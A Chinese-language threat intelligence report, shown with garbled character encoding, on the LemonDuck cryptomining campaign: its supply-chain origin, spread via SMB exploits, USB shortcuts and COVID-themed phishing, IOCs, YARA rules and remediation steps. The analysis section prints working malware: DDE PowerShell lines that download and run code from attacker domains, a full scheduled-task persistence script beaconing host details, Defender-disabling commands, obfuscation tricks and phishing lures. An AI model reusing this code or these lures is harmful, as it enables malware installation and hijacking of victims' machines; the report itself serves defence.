èµ·åºâAPTâæç¿ç»ç»âââå°é»é¸âLemonDuck

[TOC]

æè¦

èµ·æºäºéå¯¹âé©±å¨äººçâä¾åºé¾çAPTæ»å»ï¼
æç»æ¶é´é¿ï¼ä»2018å¹´12æä»½èµ·æç»è³ä»ï¼
å½±åèå´å¹¿æ³ï¼æ³¢åå¨çï¼å·²ææ°ç¾ä¸è®¾å¤è¢«ææï¼
ä¼ æéå¾å¤æ ·ï¼éè¿æ¼æ´å©ç¨ãOutlooké®ä»¶ãç§»å¨åå¨è®¾å¤è¿è¡ä¼ æï¼
å©ç¨æ°å ç«æå¯¹é®ä»¶æ»å»æ¨¡ååéå¯¹æ§åçº§ï¼ä»¥æé«æææçï¼
é¢ç¹å©ç¨å¼æºé¡¹ç®åæ°æ«é²æ¼æ´çPOCæ¥å¢å¼ºè è«ææè½åï¼
å¤æ ·æ§ï¼è¿ä»£/åçº§çé¢çè¿è¶ä»¥å¾åç°çåç±»åå¨èæ»å»ã

éè¿æ§å¶è®¡ç®æºãä¾µå è®¡ç®èµç¨äºå å¯æ°åè´§å¸çææã

å½åå¨å½åä»åç°å¤§éä¸ªäººPCåå¤å®¶ç¥åä¼ä¸è¢«ææçæåµã

åå°ææçæºå¨ä¸ç»å¤§é¨åæ¥èªäºæ¿åºä¸ä¼ä¸ã

è¿æå³çï¼âé©±å¨äººçâéåå®åæ»å»åç±»äºä»¶æå°éæ¼â¦â¦

éè¿å¯¹ç¸å³ææ¥çå³èåæååç°ï¼

ç®è¦åæ

ä»¥ä¸æ¯âå°é»é¸âæ´ä¸ªçæ»å»é¾è·¯å¾ï¼

ä¸åäºå¸¸è§çæ»å»é¾è·¯ï¼å¶æ»å»é¾è·¯ä¸ï¼

åå¨å¤ä¸ªå½åä¸åçæ»å»èæ¬ï¼ä½å¶åå®¹å®å¨ä¸è´çæåµã

å¨è¿ä¸¤æççæµå¨æä¸ï¼å·²ç»æè·å°æ°åæ¬¡æ»å»é¾çæ´æ°ã

å¶ä¸»è¦ä¼ æéå¾å¯åä¸ºä¸ç±»ï¼

éè¿æ¼æ´å©ç¨ä¼ æï¼
- ç«¯å£æ«æ
- EternalBlue/MS17-010 éå¯¹Win7/Win8
- CVE-2020-0796 ï¼2020å¹´4ææ°å¢ï¼
- æ´åç ´è§£ï¼é¤èªèº«æºå¸¦åå¸å¤ï¼è¿ä¼å°è·åæ¬å°å£ä»¤/åè¯å å¥åå¸ï¼
  - $IPC
  - SMB
  - MS-SQL
  - RDP
  - NTLM
  - WMI
  - SSHï¼2020-06-01æ°å¢ï¼éå¯¹Linux rootè´¦å·ï¼
å©ç¨ç§»å¨åå¨è®¾å¤ä¼ æ ï¼CVE-2017-8464ï¼ï¼
- éè¿å°æ¶æDLLä¸å¿«æ·æ¹å¼ï¼LNKï¼æä»¶ä¸èµ·æ¤å¥æä»¶å¤¹ä¸ï¼ä»èææå¯ç§»å¨USBé©±å¨å¨åç½ç»é©±å¨å¨ã
  
  å½å¨ä¼è§£æ.lnkå¿«æ·æ¹å¼æä»¶çä»»ä½åºç¨ç¨åºä¸æå¼é©±å¨å¨æ¶ï¼å¿«æ·æ¹å¼å°æ§è¡æ¶æçDLLç»ä»¶ã
å©ç¨Outlooké®ä»¶ä¼ æ/ç¤¾ä¼å·¥ç¨å¦ä¼ æï¼
- åå©æ°å ç«æï¼æ°å¢é¨åä¸æ°å æå³é®ä»¶ä¸»é¢
- éæºéåé®ä»¶ä¸»é¢ååå®¹ï¼åéç»ææä¸»æºä¸çææOutlookèç³»äºº
- çææ¶æææ¡£ï¼CVE-2017-8570ï¼DDEï¼ï¼æ¶æJSæä»¶

$mail_subject="The Truth of COVID-19 ????????????"
$mail_body="Virus actually comes from United States of America"

èè¿æä¸æ¬¡æ´æ°ä¸ï¼

$global:mail_pools=@(
# ä¸æ°å å³
("The Truth of COVID-19","Virus actually comes from United States of America"),
("COVID-19 nCov Special info WHO","very important infomation for Covid-19see attached document for your action and discretion."),
("HALTH ADVISORY:CORONA VIRUS","the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.see attached document for your action and discretion."),

("WTF","what's wrong with you?are you out of your mind!!!!!"),
("What the fcuk","are you out of your mind!!!!!what 's wrong with you?"),
("good bye","good bye, keep in touch"),
("farewell letter","good bye, keep in touch"),
("broken file","can you help me to fix the file,i can't read it"),
("This is your order?","file is brokened, i can't open it")
)

æ¶æRTFææ¡£æå¼åçæªå¾ï¼å¦ä¸æç¤ºï¼

æ»å»èµ·æº

2018å¹´11æ12æ¥ 10:53åï¼

11æ15æ¥ 17:17åï¼

æ»å»èéè¿å¤å±åç½æ¸éï¼æåè·ååçº§æå¡å¨ï¼103.56.77.23 , globalupdate.updrv.comï¼å£ä»¤å¹¶ç»å½ã

12æ 2æ¥è³5æ¥ï¼

ç¨äºæ»å»çååè¢«æ³¨åï¼

haqo.net  2018-12-02T14:35:52Z 
abbny.com 2018-12-03T04:06:07Z 
ackng.com 2018-12-05T06:58:03Z

12æ14æ¥ 14:15åï¼

æ»å»èå©ç¨ä»£ç 84.39.112.58ï¼ðçå£«ï¼è¿ç¨ç»å½å°åçº§æå¡å¨103.56.77.23

éåäºå½å¤©çº¦18:00å é¤

åæ¤ï¼ççä¸å°4ä¸ªå°æ¶çæ¶é´åï¼å¤è¾¾æ°åä¸å°PCåå°ææã

æç§å½æ¶çMenoå¸ä»·æ ¼æ¯10ä¸å°åµå°¸ä¸»æºï¼é¢è®¡æ¯æä¼ä¸ºæ»å»èå¸¦æ¥è¿åç¾åçæ¶ç

å¼å¾æ³¨æçæ¯ï¼æ¤æ¬¡æ»å»æ¾ç¶ä¸æ¯æå¤èæ¥ã

ä¹è®¸æ¯å¨è¿æ¬¡âæµè¯æ»å»âä¸ï¼è·åäºä¸è²çæ¶çï¼

è¿æåå¨

2020-04-27:

â DDEé¾æ¥å¯¹æ¯å¦ä¸ï¼

 Opening file: readme.doc
 DDE Links:
 DDEAUTO      "     C:\\Programs\\Microsoft\\Office    \\ 12    \\ MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c      powershell [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:%tmp%wxJadS9Xyg.sct').Exec(0)&"      "Microsoft Office Remote  Database"
 
 Opening file: urgent.doc
 DDE Links:
 DDEAUTO      "     C:\\Programs\\Microsoft\\Office    \\ 12    \\ MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c      powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.awcna.com/mail.jsp?dde*%username%*%computername%')&"      "Microsoft Office Remote  Database"

2020-05-19 :

â C&Cååtr2q.comåæ¢è§£æ ï¼æ°å¢zer9g.com

2020-05-21ï¼

â æ´æ°åï¼

2020-06-01:

â ä¸»è¦æ»å»æ¨¡åif.binä¸æ°å¢äºå¯¹äºLinux SSHçç ´åè½

â éè¿ä½¿ç¨PuTTY linkå·¥å·ï¼å³plink.exeå¯¹å±åç½å22ç«¯å£è¿è¡rootè´¦å·åå¸çã

â è¥SSHçç ´æååï¼ä¼å¨ç®å½ï¼/.Xll/xr åå¥æç¿ç¨åºï¼å¹¶å å¥crontabå®æ¶æ§è¡ ã

æº¯æºåæ

å¨éå¯¹æ ·æ¬ä¸æ¶åçåååå¶è§£æIPçå³èåæä¸åç°ï¼

å¶è¿ææ´»å¨ä¸åå¥½çååæ³¨ååä¸ºï¼https://www.epik.com

å¨æ ·æ¬çæµä¸æä»¬åç°ï¼

js.haqo.net 81.177.135.35

ä¸æäºIII v3.0 ãMykingsãMiraiãSmominruåµå°¸ç½ç»ç¸å³æ´»å¨æå³èã

ç»è¿è°æ¥åç°ï¼

è¿é¨åè§£æå¨Mykings IPä¸çåååæ æ³åå¶ä»åååä¸æ ·æä¾æ£å¸¸çC&Cæå¡

# domain
abbny.com
haqo.net
ackng.com #(è¯¥ååæ²¿ç¨è³ä»ï¼

# C&C
45.118.132.44
172.105.237.31
27.102.113.141

# ç¿æ± 
172.105.204.237

# Proxy
84.39.112.58
95.211.168.228

éè¿è¿½æº¯å¶ä¸åæ¶ææ»å»é¾çåå¨ï¼æä»¬åç°ï¼

è½ç¶âå°é»é¸âåæå¨ä¸å½çåï¼èä¸æ»å»æææ¾èã

Symantecå¨2019å¹´4æçåæï¼

80ï¼ä»¥ä¸çåå®³èä½äºä¸å½ï¼å¶ä»åå®³èä½äºé©å½ï¼æ¥æ¬åè¶åã

èå°2019å¹´10æï¼æ®Sophosçæ«é²ï¼

ä¸å½åå®³èçå æ¯éè³24%ï¼æ°å å¡17%ï¼è±å½è¾¾å°6%ï¼ç¾å½3%ï¼èä¹åè¾å¤çé©æ¥è¿æ¬¡å æ¯è¿å¨å¶åã

è¿ä½¿å¾æ»å»èå·æä¸¤ç§å¯è½ï¼

å¢åæ»å»èï¼åæææé¿å¼å¢åç¯å¢
è±è¯æ¯è¯æ»å»èï¼å¯¹è±è¯è¯ç§ä»¥å¤çç½ç»ç¯å¢ä¸çæ

å³äºå½åï¼ä¸ºå¥å«å°é»é¸ï¼

å¨åæä¸åç°ï¼

C&Cè¯·æ±å¤´çå¯ä¸åºç°çHeaderéç½®User-Agentä½¿ç¨äºæ¯è¾æææçåç¼Lemon-Duckï¼

$Lemon_Duck='MTXDaxu\qWPoOkQu'; #åå²çæ¬åºç°è¿çåéèµå¼
$Lemon_Duck='\'; #è¿ææ»å»ä¸çèµå¼

$webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('\','-'))
# User-Agent: Lemon-Duck--

"Ddrivers" 2018å¹´12æ

"MicrosoftwindowsBluetooths" 2018å¹´12æ

"Rtsa" 2019å¹´09æ

"bluetool" 2019å¹´11æ

"Rtsa1"/"Rtsa2" 2020å¹´2æ

"bluetea" 2020å¹´4æ

# mail.jsp
# report.jsp
# a.sjp
$stsrv.GetFolder("\").GetTask("bluetea")

æäºæ¥åéå°å¶å½åä¸ºâèè¶è¡å¨â

å¨åç»ä¸å½ååæ´ä¸ºâblackballâ 2020å¹´5æ

# mail.jsp
# report.jsp
# a.jsp
$stsrv.GetFolder("\").GetTask("blackball")

æä»¥ç¨Lemon-Duckæ´å·æä»£è¡¨æ§ä¸äºï¼

âLemon-Duckâæè¯ä¸ºä¸æåºä¸ºï¼âå°é»é¸â

å°è¯ææä¸ç¹å¾åéåèåçæä¹ï¼

blueteaï¼

è¶è±è±ï¼Butterfly Pea Teaï¼ä¹ç§°ä¸ºèè±è¶ãèè±è±ãè´è¶è±è±çåç§°ï¼èåç¾äººéå¸¸ç§°è¶è±è±è¶ä¸ºBlue Matcha æBlue Chai, ä¹æäººç´æ¥ç§°ä¹ä¸ºBlue Teaã

blackballï¼

âé»ä¸¸âï¼

æç¹åå°å¯ç¤ºï¼

æ£æµæ¹æ¡

å¯æ ¹æ®åç»ååºçIOCsä¿¡æ¯å¯¹ç¸å³ä¸»æºè¿è¡ææ¥ï¼
æ¥çç¸å³ä¸»æºCPUæ¯å¦è¿è¡æå¼å¸¸ï¼æ¯å¦CPUå ç¨è¿é«ï¼
æ¥çåç½ä¸»æºåç¸å³ç«¯å£å¦445ã1433ã3389ã65529ã65533çç«¯å£æ¯å¦å¼å¯ä¸æè¿è¢«æ«æææ´åç ´è§£è¡ä¸ºï¼
æ£æµç¸å³ä¸»æºæ¯å¦åå¨CVE-2017-8570åMS17-010é«å±æ¼æ´ï¼
è¿½æ¥åæ ·æ¬é®ä»¶ç¸å³çé®ç®±å°åï¼å¨å¶æ¥æ¶é®ä»¶ä¸»æºåç½ååè¿è¡å¨é¢æ£æµæ«æï¼

ä¿®å¤å»ºè®®

ä½¿ç¨ç®¡çåæéæå¼Poweshellè¾å¥ä»¥ä¸å½ä»¤ï¼

å»é¤å·²åå¥çç½ç»è§åï¼

netsh advfirewall firewall delete rule name="SDNSd"
netsh advfirewall firewall delete rule name="DNSd"
netsh interface portproxy delete v4tov4 listenport=65529
netsh interface portproxy delete v4tov4 listenport=65533

# å¦æéè¦æä¾SMBæå¡åä¸ç¨æ§è¡ä»¥ä¸å½ä»¤
netsh advfirewall firewall delete rule name="deny445"
netsh advfirewall firewall delete rule name="deny445"

æ¥çå®æ¶ä»»å¡ï¼

function Get-AllTaskSubFolders {
    [cmdletbinding()]
    param (
        $FolderRef = $Schedule.getfolder("\")
    )
    if ($FolderRef.Path -eq '\') {
        $FolderRef
    }
    if (-not $RootFolder) {
        $ArrFolders = @()
        if(($folders = $folderRef.getfolders(1))) {
            $folders | ForEach-Object {
                $ArrFolders += $_
                if($_.getfolders(1)) {
                    Get-AllTaskSubFolders -FolderRef $_
                }
            }
        }
        $ArrFolders
    }
}

$Schedule = New-Object ComObject ("Schedule.Service");
$Schedule.connect($env:COMPUTERNAME);

foreach ($Folder in Get-AllTaskSubFolders) {
    if (($Tasks = $Folder.GetTasks(1))) {
        $Tasks | Foreach-Object {
            if (($_.State -gt 1)) {
                New-Object -TypeName PSCustomObject -Property @{
                            'Name' = $_.name
                            'State' = switch ($_.State) {
                                0 {'Unknown'}
                                1 {'Disabled'}
                                2 {'Queued'}
                                3 {'Ready'}
                                4 {'Running'}
                                Default {'Unknown'}
                            }
                            'Path' = $_.path
                }
            }
        }
    }
}

æ¥çæ¯å¦å·æææ¾éæºçä»»å¡åï¼ç¶åæ ¹æ®è·¯å¾å é¤ï¼

schtasks /delete /tn PATH /F

å¦åç°ä¸æä¸»æºï¼åºç«å³åæç½ç»ï¼å³é445ç«¯å£æå¡ï¼è¿è¡å¨é¢æ¥æï¼
å¯¹CVE-2017-8570ï¼MS17-010ï¼CVE-2020-0796ç¸å³æ¼æ´åæ¶æè¡¥ä¸ï¼
- CVE-2017-8570è¡¥ä¸ä¿¡æ¯åèï¼https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8570;
MS17-010è¡¥ä¸ä¿¡æ¯åèï¼https://support.microsoft.com/zh-cn/help/4012598/title
- CVE-2020-0796ä¿¡æ¯åèï¼https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

é²èå»ºè®®

åæ¢ä½¿ç¨Win7ï¼20201æ14æ¥åå¾®è½¯å·²åæ¢å¯¹å¶ç»´æ¤ï¼
åæ¶å¯¹åç½ä¸»æºæè¡¥ä¸ï¼
å å¼ºç³»ç»å®å¨æ§ãèº«ä»½éªè¯åå å¯æºå¶æå©äºé²æ¢å¯¹ç®æ ç³»ç»è¿è¡æªç»ææçä¿®æ¹ï¼ä½¿ç¨é«å¼ºåº¦å¯ç ï¼å¹¶å®ææ´æ°ï¼ä¸è¦ä½¿ç¨å¼±å£ä»¤ï¼
å¤å°è®¾å¤ä¸è¦ä½¿ç¨ç¸åå¯ç ï¼è è«ä¼æåæ¬æºå¯ç ï¼æ»å»å±åç½ä¸çå¶å®æºå¨ï¼
å³éä¸»æºä¸å¿è¦çç«¯å£ï¼å¦445ï¼65529çï¼ï¼å¹¶ä½¿ç¨ä¸¥æ ¼çæéæ§å¶ï¼
é¨ç½²å¶ä»å®å¨æºå¶ï¼ä¾å¦è¡ä¸ºçè§ï¼ä»¥æ£æµå¹¶é²æ¢å¼å¸¸ä¾ç¨ææªææç¨åºæèæ¬çè¿è¡ãä¼ä¸åIDS/IPSé²æ¤è®¾å¤æ ¹æ®åç»ååºçYaraæ£æµè§åè¿è¡æ´æ°ï¼
ç¦ç¨PowerShellï¼å ä¸ºæ®éç¨æ·åéææ¯ç¨æ·é½ä¸éè¦ï¼

ä½¿ç¨ç®¡çåæéæå¼Powershellï¼è¾å¥ä»¥ä¸å½ä»¤ï¼ç¶ååè½¦
```
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
```

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{F20DA720-C02F-11CE-927B-0800095AE340}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{F20DA720-C02F-11CE-927B-0800095AE340}" /v "ActivationFilterOverride" /t REG_DWORD /d 0x1

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{F20DA720-C02F-11CE-927B-0800095AE340}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{F20DA720-C02F-11CE-927B-0800095AE340}" /v "ActivationFilterOverride" /t REG_DWORD /d 0x1

ç¦ç¨SMBçåç¼©åè½ï¼

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

IOCs

ä»¥ä¸æ¯æå³è¯¥APTæ´»å¨çç¸å³IoCs:

Domainï¼

C&C:

abbny.com
p.abbny.com
info.abbny.com

haqo.net
i.haqo.net
info.haqo.net

beahh.com
v.beahh.com
w.beahh.com
p.beahh.com
d.beahh.com
oom.beahh.com
info.beahh.com

minicen.ga
img.minicen.ga
t.minicen.ga


y6h.net
v.y6h.net

zer2.com
lpp.zer2.com
t.zer2.com

awcna.com   (2020-04-21åæ¢è§£æ)
t.awcna.com

tr2q.com
t.tr2q.com  (2020-05-20åæ¢è§£æ)

amynx.com   (æªå¯ç¨)
t.amynx.com (æªå¯ç¨) ï¼2020-05-26åç°å¯ç¨ï¼

zer9g.com
t.zer9g.com  (2020-05-21æ°å¢,åä»£t.tr2q.com)

zz3r0.com    
t.zz3r0.com  (2020-05-25æ°å¢,åä»£t.awcna.comï¼)


jdjdcjq.top
t.jdjdcjq.top (2020-06-01æ°å¢ï¼ç¨äºLinux)

Miner Pools & Payload Serverï¼

# ç¿æ± å°å
lpp.zer2.com
lp.haqo.net
lpp.awcna.com
lplp.haqo.net
lplp.beahh.com
lplp.abbny.com
lplp.ackng.com

p.k3qh4.com
p.b69kq.com

# Payloadåæ¾
d.ackng.com 
info.ackng.com
down.ackng.com

haqo.net
dl.haqo.net

IP:

66.42.43.37
172.104.7.85

207.154.225.82
128.199.183.160

206.189.144.115
138.68.30.50

128.199.64.236

161.35.107.193

167.71.87.85
45.79.77.20

# proxy
84.39.112.58
95.211.168.228

MD5:

ç±äº

98bf04d3d6e25c0cac4ac6af604bcdbf 
779c89b9404bdd69547c28885167f131
d0b03daf3c84987768bd4ce8e2a77548
51f6eba99e2b33e5458d78e41a130fe2
db50d9392ea9dd0efceb2364f0e2f187
5d4d94ee7e06bbb0af9584119797b23a
f3b25701fe362ec84616a93a45ce9998
df5c8f7677a3361d17cc1ba820436ce9

Ports:

43668
65529
65533

File:

# Windows
$env:tmp\GkwiGedjuq8391j.txt
$env:tmpGkPiGedjuq8f91j.txt
$env:tmp\godmali3.txt
$env:tmp\kk4kk.log
$env:tmp\nvdg.dat
$env:temp\tt.vbs
# Linux 
/.Xll/xr
# Driver
DRIVE:\UTFsync\\inf_data

Yara:

CVE-2017-8570æ»å»æä»¶ YARAæ£æµè§åï¼

rule rtf_composite_moniker {
   meta:
      ref = "https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html"
   strings:
      $header_rtf = "{\\rt" nocase
      $composite_moniker = "0903000000000000C000000000000046" nocase
      $new_moniker = "C6AFABEC197FD211978E0000F8757E2A" nocase
   condition:
      $header_rtf at 0 and $composite_moniker and $new_moniker
}

DDE æä»¶ YARAæ£æµè§åï¼

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
 
rule Office_DDEAUTO_field {
  strings:
    $a = /<w:fldChar\s+?w:fldCharType="begin"\/>.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?<w:fldChar\s+?w:fldCharType="end"\/>/
  condition:
    $a
}
rule Office_DDE_field {
  strings:
    $a = /<w:fldChar\s+?w:fldCharType="begin"\/>.+?\b[Dd][Dd][Ee]\b.+?<w:fldChar\s+?w:fldCharType="end"\/>/
  condition:
    $a
}
rule Office_OLE_DDEAUTO {
  strings:
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
rule Office_OLE_DDE {
  strings:
    $a = /\x13\s*DDE\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}

Mimikatz YARAæ£æµè§åï¼

rule mimikatz
{
	meta:
		description		= "mimikatz"
		author			= "Benjamin DELPY (gentilkiwi)"
		tool_author		= "Benjamin DELPY (gentilkiwi)"
	strings:
		$exe_x86_1		= { 89 71 04 89 [0-3] 30 8d 04 bd }
		$exe_x86_2		= { 8b 4d e? 8b 45 f4 89 75 e? 89 01 85 ff 74 }
		$exe_x64_1		= { 33 ff 4? 89 37 4? 8b f3 45 85 c? 74}
		$exe_x64_2		= { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }
		$dll_1			= { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
		$dll_2			= { c7 0? 10 02 00 00 ?? 89 4? }
		$sys_x86		= { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
		$sys_x64		= { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
	condition:
		(all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*))
}

PUBLIC KEYï¼

æ»å»èä½¿ç¨ç¨æ¥éªè¯C&Cæå¡å¨è¿ååå®¹çRSAå¬é¥ï¼

å¶ä½¿ç¨çIEX (invoke-expression) æ··æ·:

# mail.jsp
( $SHEllid[1]+$sHELlID[13]+'X')
( $EnV:cOmSpeC[4,15,25]-JoiN'')
## 2020-05-21
( $VErboseprEFereNCe.TOstRING()[1,3]+'X'-joIN'')
# x.jsp
( $sHEllid[1]+$ShELlID[13]+'x')
( ([StrINg]$vERbosepRefEreNcE)[1,3]+'X'-jOIN'') 
$sHeLlID[1]+$ShELLID[13]+'X'
# if.bin
( $SHElLid[1]+$sHElLID[13]+'X')
$PSHOME[4]+$pSHoMe[30]+'x'
( $pSHoMe[21]+$PShoME[30]+'x')
# report.jsp
((varIABlE '*mDR*').NAME[3,11,2]-jOin'')
((Gv '*mdR*').nAme[3,11,2]-joiN'')
# a.jspmail
(([strINg]$VErBoSeprEFErenCE)[1,3]+'x'-Join'')
( $ShelLId[1]+$sHelliD[13]+'x') 
( $enV:comSPec[4,15,25]-jOin'')
## 2020-05-21
( $pSHOMe[21]+$pSHome[34]+'X')

# if_main.bin
( $VerbOsepReFeRencE.TOsTring()[1,3]+'x'-jOin'')
((vArIaBLe '*MDr*').Name[3,11,2]-JoiN'')
( $Env:comSPEc[4,15,25]-JoIN'') 

# 7p.php
( $ShelLiD[1]+$SHellid[13]+'X')
( $pShOmE[4]+$PsHomE[34]+'X')
# rdp.jsp
( $VErboseprEFereNCe.TOstRING()[1,3]+'X'-joIN'')
( $PShOME[4]+$pShOmE[34]+'X')
( $Env:comsPeC[4,26,25]-jOin'')

# ipc.ps1
((VaRiaBlE '*MDr*').NAme[3,11,2]-jOIN'')
( $VeRboseprefERENcE.toSTRiNg()[1,3]+'X'-JOIn'')

è¯¦ç»åæ

killchain

ä»æ¶å°é®ä»¶å¼å§

("The Truth of COVID-19","Virus actually comes from United States of America"),
("COVID-19 nCov Special info WHO","very important infomation for Covid-19 see attached document for your action and discretion."),
("HALTH ADVISORY:CORONA VIRUS","the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.see attached document for your action and discretion."),

("WTF","what's wrong with you?are you out of your mind!!!!!"),

("What the fcuk","are you out of your mind!!!!!what 's wrong with you?"),
("good bye","good bye, keep in touch"),
("farewell letter","good bye, keep in touch"),
("broken file","can you help me to fix the file,i can't read it"),
("This is your order?","file is brokened, i can't open it")
)

å¶ä¸åå«ä¸¤ä¸ªéä»¶ï¼

Readme.doc å Readme.zip

ææ¡£æå¼åçæªå¾ï¼

æ¤å¤ï¼æä»¬è¿è½çå°è¿æ ·çåè¦ï¼

$dde_cmd="powershell [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:%tmp%\$filename').Exec(0)&"

ä»¥ä¸æ¯è§£æåçå¨.sctæä»¶ä¸æå¥çPowershellå½ä»¤ï¼

IEx(New-Object Net.WebClient).DownLoadString(\'http://t.tr2q.com/7p.php?0.7*mail_doc*%username%*%computername%*\'+[Environment]::OSVersion.version.Major);
bpu (\'http://t.tr2q.com/mail.jsp?doc_0.7\');
del %tmp%\\RANDOM.sct

æ§è¡å.sctè¿ä¼å°èªå·±ä»ä¸´æ¶ç®å½ä¸å é¤ã

7p.php (BypassUAC)

http://t.tr2q.com/7p.php?0.7*mail_doc*<SYS ENV>
(MD5 = f8dc697b1812f61cf56bb656e90eabce)

å»é¤å¤å±æ··æ·åï¼åç°å¶å®ä¹:

å½æ°bpu (BypassUACçææï¼å½åè§èçå¥½ï¼ä¸è¾æ®éç¨åºç¿)

function bpu($payload){
	# windowsçæ¬
	$ver=[Environment]::OSVersion.Version.Major
	# # å³éWindowsDefender å®æ¶é²æ¤
	# cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;
	# Add-MpPreference -ExclusionPath c:\;
	# Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden
	}
	# å¦ææ¯win10
	if ($ver -eq 10) {
	# â¦â¦
	}
	# UACç»è¿è·å¾ç®¡çåæé
	# â¦â¦
}

mail.jsp (create schtasks)

http://t.tr2q.com/mail.jsp?doc_0.7\
(MD5 = 51f6eba99e2b33e5458d78e41a130fe2)

$v="?$v"+(Get-Date -Format '_yyyyMMdd')
# åå¨æ»å»æä»¤çåé
$tmps='function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String(''2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10='');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url=''http://''+''U1''+''U2'';a($url+''/a.jsp'+$v+'?''+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join''*''))'
# å¤æå½åæ¯å¦æ¯è¶çº§ç®¡çåæé
$sa=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
# DGAå½æ°(å¶å®æ¯çº¯éæºåä¸²å½æ°)
function getRan(){return -join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6))}
$us=@('t.awcna.com','t.zer9g.com','t.amynx.com')
$stsrv = New-Object -ComObject Schedule.Service
$stsrv.Connect()
# æ¥çæ¯å¦å·²ç»åå¨åä¸ºblackballçå®æ¶ä»»å¡
try{
	$doit=$stsrv.GetFolder("\").GetTask("blackball")
}catch{}
if(-not $doit){
	if($sa){
		schtasks /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	} else {
		schtasks /create /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	}
	foreach($u in $us){
		# è·åååä¸æ 
		$i = [array]::IndexOf($us,$u)
		# æ ¹æ®é¤3ä½æ°ï¼éæ©è®¡åä»»å¡å
		if($i%3 -eq 0){$tnf=''}
		if($i%3 -eq 1){$tnf=getRan}
		if($i%3 -eq 2){if($sa){$tnf='MicroSoft\Windows\'+(getRan)}else{$tnf=getRan}}
		$tn = getRan
		if($sa){
			# æ¯60å  æ§è¡å½ä»¤powershell PS_CMD  /F é»æ¢ç³»ç»ç¡®è®¤æ¶æ¯
			schtasks /create /ru system /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
		} else {
			schtasks /create /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
		}
		start-sleep 1
		# è·åæå®ä½ç½®çå®æ¶ä»»å¡
		$folder=$stsrv.GetFolder("\$tnf")
		# è·åééèä»»å¡ä»¥å¤çææä»»å¡
		$taskitem=$folder.GetTasks(1)
		foreach($task in $taskitem){
			foreach ($action in $task.Definition.Actions) {
				try{
					# è¥åæ°ä¸åå¨PS_CMD
					if($action.Arguments.Contains("PS_CMD")){	
						# æ¿æ¢ä¸ºæ»å»æä»¤
						$folder.RegisterTask($task.Name, $task.Xml.replace("PS_CMD",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5))), 4, $null, $null, 0, $null)|out-null
					}
				}catch{}
			}
		}
		schtasks /run /tn "$tnf\$tn"
		start-sleep 5
	}
}

# å é¤èçæ¬ä»»å¡
schtasks /delete /tn Rtsa2 /F
schtasks /delete /tn Rtsa1 /F
schtasks /delete /tn Rtsa /F

